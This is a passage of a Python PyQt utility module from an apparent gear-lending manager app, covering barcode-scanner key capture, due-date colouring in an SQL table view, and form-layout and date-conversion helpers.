# Check to see if the prefix (or parts of it) are in text
prefix_len = len(scanPrefix)
for n in xrange(prefix_len):
if scanPrefix[:prefix_len - n] in self.parent().keyStrokeList + event.text():
self.parent().keyStrokeList += event.text().strip()
self.parent().scannerIsTyping = True
if scanSuffix in self.parent().keyStrokeList:
self.parent().scannerIsTyping = False
scanner_just_finished = True
gear_id = self.parent().keyStrokeList.strip(scanSuffix).strip()
self.parent().keyStrokeList = ''
self.parent().set_scanner_field(gear_id)
break
if self.parent().scannerIsTyping or scanner_just_finished:
event.accept()
return True
# standard event processing
return QtCore.QObject.eventFilter(self, obj, event)
outDateCol = 3
dueDateCol = 4
class DateEditDelegate(QtGui.QStyledItemDelegate):
def createEditor(self, parent, option, index):
if index.column() == outDateCol or index.column() == dueDateCol:
editor = QtGui.QDateEdit(parent)
return editor
else:
return super(DateEditDelegate, self).createEditor(parent, option, index)
def setEditorData(self, date_edit, index):
if index.column() == outDateCol or index.column() == dueDateCol:
d = index.model().data(index, QtCore.Qt.EditRole)
date_edit.setCalendarPopup(True)
date_edit.setDate(d)
else:
return super(DateEditDelegate, self).setEditorData(date_edit, index)
def setModelData(self, date_edit, model, index):
if index.column() == dueDateCol:
d = convert_date('Qt2DB', date_edit.date())
model.setData(index, d, QtCore.Qt.EditRole)
else:
return super(DateEditDelegate, self).setModelData(date_edit, model, index)
def updateEditorGeometry(self, editor, option, index):
if index.column() == outDateCol or index.column() == dueDateCol:
editor.setGeometry(option.rect)
else:
return super(DateEditDelegate, self).updateEditorGeometry(editor, option, index)
# def displayText(self, value, locale):
#
# if locale.column() == outDateCol:
# pass
# else:
# return super(DateEditDelegate, self).displayText(value, locale)
class TransactionSqlModel(QtSql.QSqlRelationalTableModel):
def flags(self, index):
flags = super(TransactionSqlModel, self).flags(index)
if 0 <= index.column() < dueDateCol:
if flags & QtCore.Qt.ItemIsEditable:
flags ^= QtCore.Qt.ItemIsEditable
return flags
def data(self, index, role):
due_date = super(TransactionSqlModel, self).data(self.index(index.row(), dueDateCol), QtCore.Qt.DisplayRole)
due_date = QtCore.QDate.fromString(due_date, DB_Date)
if role == QtCore.Qt.BackgroundRole:
if QtCore.QDate.currentDate().daysTo(due_date) == 0: # Gear is due today
return QtGui.QBrush(QtGui.QColor(color['yellow']))
elif QtCore.QDate.currentDate().daysTo(due_date) < 0: # Gear is late
return QtGui.QBrush(QtGui.QColor(color['red']))
else: # Gear is not due yet
return QtGui.QBrush(QtGui.QColor(color['green']))
if role == QtCore.Qt.DisplayRole:
if index.column() == outDateCol:
d = super(TransactionSqlModel, self).data(index, role)
if d:
d = QtCore.QDateTime.fromString(d, DB_DateTime)
return d.toString(disp_DateTime)
# Set column 'dueDateCol' to a date edit field
if index.column() == dueDateCol:
d = super(TransactionSqlModel, self).data(index, role)
if d:
return convert_date('DB2Qt', d)
return super(TransactionSqlModel, self).data(index, role)
class QTableViewCustom(QtGui.QTableView):
def __init__(self, parent):
super(QTableViewCustom, self).__init__(parent)
self.parent = parent
# self.editCol = editCol
self.scannerIsTyping = False
self.keyStrokeList = ''
self.installEventFilter(KeyPressEater(self))
def set_scanner_field(self, gear_id):
self.parent.set_scanner_field(gear_id)
def make_line_edit(this, label_name, place_holder=None):
lab = QtGui.QLabel(label_name)
edit = QtGui.QLineEdit(this)
if place_holder:
edit.setPlaceholderText(place_holder)
return lab, edit
def make_line_edit_display_only():
line_edit = QtGui.QLineEdit(None)
line_edit.setFrame(False)
line_edit.setReadOnly(True)
line_edit.setFocusPolicy(QtCore.Qt.NoFocus)
line_edit.setAutoFillBackground(True)
return line_edit
def make_line_edit_combobox(this, line_label, line_placeholder, box_label):
# Search box
name_label, line_edit = make_line_edit(this, line_label, line_placeholder)
# Birthday display box
box_label = QtGui.QLabel(box_label)
box = QtGui.QComboBox()
box.setEditable(False)
box.setInsertPolicy(QtGui.QComboBox.InsertAlphabetically)
return name_label, line_edit, box_label, box
def address_layout(this, pre, address_label):
this.__dict__[pre + 'addrLab'] = QtGui.QLabel(address_label)
this.__dict__[pre + 'addrLab'].setAlignment(QtCore.Qt.AlignTop)
this.__dict__[pre + 'streetEdit'] = make_line_edit(this, 'Street', 'Street')[1]
this.__dict__[pre + 'cityEdit'] = make_line_edit(this, 'City', 'City')[1]
this.__dict__[pre + 'stateBox'] = QtGui.QComboBox()
this.__dict__[pre + 'zipEdit'] = make_line_edit(this, 'Zipcode', 'Zip')[1]
this.__dict__[pre + 'zipEdit'].setMaxLength(5)
states = ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DE', 'FL', 'GA',
'HI', 'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD',
'ME', 'MI', 'MN', 'MO', 'MS', 'MT', 'NC', 'ND', 'NE', 'NH',
'NJ', 'NM', 'NV', 'NY', 'OH', 'OK', 'OR', 'PA', 'RI', 'SC',
'SD', 'TN', 'TX', 'UT', 'VA', 'VT', 'WA', 'WI', 'WV', 'WY']
this.__dict__[pre + 'stateBox'].insertItem(0, '')
this.__dict__[pre + 'stateBox'].insertItems(1, states)
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.setColumnStretch(0, 1)
# Place the objects on the page
grid.addWidget(this.__dict__[pre + 'streetEdit'], 0, 0, 1, 3)
grid.addWidget(this.__dict__[pre + 'cityEdit'], 1, 0); grid.addWidget(this.__dict__[pre + 'stateBox'], 1, 1); grid.addWidget(this.__dict__[pre + 'zipEdit'], 1, 2)
return grid
def emergency_contact_layout(this, suff):
this.__dict__['emNameLab' + suff], this.__dict__['emNameEdit' + suff] = make_line_edit(this, 'Name', '')
this.__dict__['emRelatLab' + suff], this.__dict__['emRelaltEdit' + suff] = make_line_edit(this, 'Relation', '')
this.__dict__['emHPhoneLab' + suff], this.__dict__['emHPhoneEdit' + suff] = make_line_edit(this, 'H Phone', 'XXX-XXX-XXXX')
this.__dict__['emWPhoneLab' + suff], this.__dict__['emWPhoneEdit' + suff] = make_line_edit(this, 'W Phone', 'XXX-XXX-XXXX')
this.__dict__['emCPhoneLab' + suff], this.__dict__['emCPhoneEdit' + suff] = make_line_edit(this, 'C Phone', 'XXX-XXX-XXXX')
grid = QtGui.QGridLayout()
grid.setSpacing(10)
# Place the objects on the page
# addrLay = addressLayout(this, 'em' + suff, 'Address')
grid.addWidget(this.__dict__['emNameLab' + suff], 0, 0); grid.addWidget(this.__dict__['emNameEdit' + suff], 0, 1, 1, 3); grid.addWidget(this.__dict__['emRelatLab' + suff], 0, 4); grid.addWidget(this.__dict__['emRelaltEdit' + suff], 0, 5)
grid.addWidget(this.__dict__['emHPhoneLab' + suff], 1, 0); grid.addWidget(this.__dict__['emHPhoneEdit' + suff], 1, 1); grid.addWidget(this.__dict__['emWPhoneLab' + suff], 1, 2); grid.addWidget(this.__dict__['emWPhoneEdit' + suff], 1, 3); grid.addWidget(this.__dict__['emCPhoneLab' + suff], 1, 4); grid.addWidget(this.__dict__['emCPhoneEdit' + suff], 1, 5)
# grid.addWidget(this.__dict__['em' + suff + 'addrLab'], 2, 0); grid.addLayout(addrLay , 2, 1, 2, 5)
return grid
def certification_layout(this, lab, checkbox_only=False):
set_label = ''
for c in lab:
if c.isupper():
set_label += ' '
set_label += c
set_label = set_label.strip()
Ckbx = QtGui.QCheckBox(set_label)
if checkbox_only:
return Ckbx
date_edit = QtGui.QDateEdit(date=QtCore.QDate.currentDate())
date_edit.setDisabled(True)
vouched = QtGui.QLineEdit(this)
vouched.setCompleter(this.parent.memberNameComp)
vouched.setDisabled(True)
if checkbox_only:
return Ckbx
else:
return Ckbx, date_edit, vouched
def convert_date(conversion, input_date):
def DB2Qt(in_date):
return QtCore.QDate.fromString(in_date, DB_Date)
def DB2Disp(in_date):
return Qt2Disp(DB2Qt(in_date))
def Disp2DB(in_date):
return QtCore.QDate.fromString(in_date, dateDispFormat).toString(DB_Date)
def Disp2Qt(in_date):
return DB2Qt(Disp2DB(in_date))
def Qt2Disp(in_date):
return in_date.toString(dateDispFormat)
def Qt2DB(in_date):
return Disp2DB(Qt2Disp(in_date))
conversions = {'DB2Qt': DB2Qt,
'DB2Disp': DB2Disp,
'Disp2DB': Disp2DB,
'Disp2Qt': Disp2Qt,
'Qt2Disp': Qt2Disp,
'Qt2DB': Qt2DB}
if isinstance(input_date, list):
for n in xrange(len(input_date)):
input_date[n] = conversions[conversion](input_date[n])
else:
input_date = conversions[conversion](input_date)
return input_date
def is_number(s):
try:
float(s)
return True
except ValueError:
return False
def remove_duplicates(dup_list):
if not isinstance(dup_list, (list, set)):
raise ValueError
seen = set()
seen_add = seen.add
return [x for x in dup_list if x not in seen and not seen_add(x)]
def sort_list(list_to_sort):
# Remove duplicates
list_to_sort = list(set(list_to_sort))
# Sort the list case insensitively
list_to_sort = sorted(list_to_sort, key=lambda s: s.lower())
return list_to_sort
|
galbrads/Gear_Manager
|
Util.py
|
Python
|
mit
| 12,446
|